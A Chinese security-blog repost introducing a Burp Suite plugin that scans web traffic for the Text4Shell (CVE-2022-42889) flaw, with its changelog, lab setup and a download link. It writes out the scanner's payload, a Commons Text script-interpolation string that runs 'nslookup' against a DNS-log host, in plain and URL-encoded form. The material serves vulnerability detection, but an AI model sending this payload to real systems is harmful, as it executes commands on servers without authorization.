Text4Shell的burp被动扫描插件

admin 2023年10月12日10:35:45评论24 views字数 943阅读3分8秒阅读模式
项目地址:https://github.com/A0WaQ4/BurpText4ShellScan
简介

使用java编写的Text4shell burp被动扫描插件

java maven项目,可以使用mvn package进行编译

更新

1.0 - 首次上传,对所有经过burp的包进行被动扫描,扫描对象包括了jsonxmlfileupload1.1 - 修复了body为空时导致的检测错误,修复了对URL参数不检测的错误1.2 - 修复了body仅有json与xml时出现的参数构造错误,修复了dns二次检测时未获取key导致的错误1.3 - 添加了主动扫描功能1.4 - 添加了header黑名单功能,可以在resources/config.yml中修改

payload

- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"- "${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup dns-url')}"

可以在resources/config.yml修改

使用

1. 搭建环境

使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建环境

Text4Shell的burp被动扫描插件

2. 插件

代理访问http://yourip:80/text4shell/attack?search=aaa,开始扫描

在logger中可看见插件发送的包

Text4Shell的burp被动扫描插件

仅对是否可以dnslog进行扫描,若dnslog接受到请求,则爆出漏洞

Text4Shell的burp被动扫描插件

Text4Shell的burp被动扫描插件

3. 配置

在resources/config.yml中的dnsLogModule修改dnslog配置,使用时可以修改为自搭建的DnsLog服务器

Text4Shell的burp被动扫描插件

免责声明

该工具仅用于安全自查检测,由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

下载链接:

https://pan.quark.cn/s/a832d2a6aa8a

原文始发于微信公众号(菜鸟学信安):Text4Shell的burp被动扫描插件

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月12日10:35:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Text4Shell的burp被动扫描插件http://cn-sec.com/archives/2105306.html

发表评论

匿名网友 填写信息